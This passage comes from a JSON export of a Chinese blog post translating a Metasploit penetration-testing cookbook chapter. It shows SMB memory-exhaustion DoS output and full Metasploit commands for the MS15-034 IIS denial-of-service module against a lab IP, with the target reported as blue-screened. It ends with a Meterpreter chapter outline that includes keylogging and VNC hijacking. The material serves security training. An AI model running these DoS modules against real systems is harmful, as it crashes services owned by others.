class=\"hljs-number\">1017 <\/span><span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Holding<\/span> <span class=\"hljs-string\">steady<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">1017 <\/span><span class=\"hljs-string\">socket(s)<\/span> <span class=\"hljs-string\">open<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>3\u3001\u67e5\u770b\u76ee\u6807\u673a\u5668\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u7531\u4e8e\u653b\u51fb\u8005\u53d1\u9001\u4e86\u5927\u91cf\u7684<code>SMB<\/code>\u8bf7\u6c42\u6d88\u8017\u4e86\u76ee\u6807\u673a\u7684\u5927\u91cf\u5185\u5b58\u3002\u6bcf\u4e00\u4e2a\u00a0<code>NBSS<\/code>\u00a0\u8fde\u63a5\u53ef\u4ee5\u7533\u8bf7\u5206\u914d\u00a0<code>128 KB<\/code>\u00a0\u5185\u5b58\u7a7a\u95f4\uff0c\u5728\u5efa\u7acb\u5927\u91cf\u8fde\u63a5\u7684\u60c5\u51b5\u4e0b\u53ef\u4ee5\u8017\u5c3d\u5185\u5b58\uff0c\u8fbe\u5230\u62d2\u7edd\u670d\u52a1\u7684\u6548\u679c\u3002<\/p>\n<figure><figcaption><\/figcaption><\/figure>\n<p>\u53e6\u4e00\u4e2a\u53ef\u6015\u7684<code>DoS<\/code>\u653b\u51fb\u662f<code>MS15-034<\/code>HTTP\u534f\u8bae\u6808\u8bf7\u6c42\u5904\u7406\u62d2\u7edd\u670d\u52a1\u3002<\/p>\n<p>\u5982\u679c<code>Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012<\/code>\u673a\u5668\u6b63\u5728\u8fd0\u884c\u4e86\u5b58\u5728<code>MS15-034<\/code>\u6f0f\u6d1e\u7684<code>IIS<\/code>\u670d\u52a1\uff0c\u90a3\u4e48\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5bfc\u81f4\u76ee\u6807\u670d\u52a1\u5668\u5d29\u6e83\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">auxiliary\/dos\/http\/ms15_034_ulonglongadd<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">DOS<\/span> <span class=\"hljs-string\">request<\/span> <span class=\"hljs-string\">sent<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Scanned<\/span> <span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">hosts<\/span> <span class=\"hljs-string\">(100%<\/span> <span class=\"hljs-string\">complete)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Auxiliary<\/span> <span class=\"hljs-string\">module<\/span> <span class=\"hljs-string\">execution<\/span> <span class=\"hljs-string\">completed<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">auxiliary(dos\/http\/ms15_034_ulonglongadd)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<figure><figcaption><\/figcaption><\/figure>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u76ee\u6807\u6b7b\u673a\u84dd\u5c4f\u4e86\u3002<\/p>\n<h4 class=\"heading\">\u76f8\u5173\u5b9e\u9a8c\u5728\u7ebf\u5b66\u4e60<\/h4>\n<p>Metasploit\u653b\u51fblinux\u5b9e\u4f8b<\/p>\n<p>Metasploit\u653b\u51fbwinserver2008\u5b9e\u4f8b<\/p>\n<h3 class=\"heading\"><a name=\"t1\"><\/a><a name=\"t1\"><\/a>\u7b2c\u56db\u7ae0 Meterpreter \uff08\u9884\u544a\uff09<\/h3>\n<p>\u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9\uff1a<\/p>\n<p>1\u3001\u4e86\u89e3Meterpreter\u6838\u5fc3\u547d\u4ee4<\/p>\n<p>2\u3001\u4e86\u89e3Meterpreter\u6587\u4ef6\u7cfb\u7edf\u547d\u4ee4<\/p>\n<p>3\u3001\u4e86\u89e3Meterpreter\u7f51\u7edc\u547d\u4ee4<\/p>\n<p>4\u3001\u4e86\u89e3Meterpreter\u7cfb\u7edf\u547d\u4ee4<\/p>\n<p>5\u3001\u4e0e\u76ee\u6807\u5efa\u7acb\u591a\u91cd\u901a\u4fe1\u4fe1\u9053<\/p>\n<p>6\u3001Meterpreter\u53cd\u53d6\u8bc1<\/p>\n<p>7\u3001\u5c4f\u5e55\u548c\u952e\u76d8\u76d1\u542c<\/p>\n<p>8\u3001\u4f7f\u7528 scraper Merterpreter\u811a\u672c<\/p>\n<p>9\u3001\u4f7f\u7528 winenum \u679a\u4e3e\u7cfb\u7edf\u4fe1\u606f<\/p>\n<p>10\u3001\u81ea\u52a8\u5316\u811a\u672c<\/p>\n<p>11\u3001Meterpreter\u8d44\u6e90\u811a\u672c<\/p>\n<p>12\u3001Meterpreter\u8d85\u65f6\u63a7\u5236<\/p>\n<p>13\u3001Meterpreter\u4f11\u7720\u63a7\u5236<\/p>\n<p>14\u3001Meterpreter\u4f20\u8f93<\/p>\n<p>15\u3001\u6ce8\u518c\u8868\u64cd\u4f5c<\/p>\n<p>16\u3001\u52a0\u8f7d\u6846\u67b6\u63d2\u4ef6<\/p>\n<p>17\u3001API\u548cMixins<\/p>\n<p>18\u3001Railgun\u2014\u2014\u5c06Ruby\u8f6c\u6362\u4e3a\u6b66\u5668<\/p>\n<p>19\u3001\u5411Railgun\u4e2d\u6dfb\u52a0DLL\u548c\u51fd\u6570\u5b9a\u4e49<\/p>\n<p>20\u3001\u52ab\u6301\u8fdc\u7a0bVNC<\/p>\n<p>21\u3001\u5f00\u542f\u8fdc\u7a0b\u684c\u9762<\/p>\n<h3 class=\"heading\"><a name=\"t2\"><\/a><a name=\"t2\"><\/a>\u8bf4\u660e<\/h3>\n<p>\u539f\u4e66\uff1a\u300aMetasploit Penetration Testing Cookbook - Third Edition\u300b<\/p>\n<p><a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/link.juejin.im\/?target=https%3A%2F%2Fwww.packtpub.com%2Fnetworking-and-servers%2Fmetasploit-penetration-testing-cookbook-third-edition\" rel=\"nofollow\">www.packtpub.com\/networking-\u2026<\/a><\/p>\n<p>\u672c\u6587\u7531\u6cd3\u6e90\u89c6\u91ce\u7ffb\u8bd1\uff0c\u8f6c\u8f7d\u8bf7\u6ce8\u660e\u6765\u6e90\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u771f\u5b9e\u73af\u5883\uff0c\u5728\u7ebf\u5b9e\u64cd\u5b66\u7f51\u7edc\u5b89\u5168 \uff1b \u5b9e\u9a8c\u5185\u5bb9\u6db5\u76d6\uff1a\u7cfb\u7edf\u5b89\u5168\uff0c\u8f6f\u4ef6\u5b89\u5168\uff0c\u7f51\u7edc\u5b89\u5168\uff0cWeb\u5b89\u5168\uff0c\u79fb\u52a8\u5b89\u5168\uff0cCTF\uff0c\u53d6\u8bc1\u5206\u6790\uff0c\u6e17\u900f\u6d4b\u8bd5\uff0c\u7f51\u5b89\u610f\u8bc6\u6559\u80b2\u7b49\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528 \u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9 1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668 2\u3001SQL\u6ce8\u5165\u653b\u51fb 3\u3001she [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-491","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/491","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=491"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/491\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=491"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=491"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=491"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}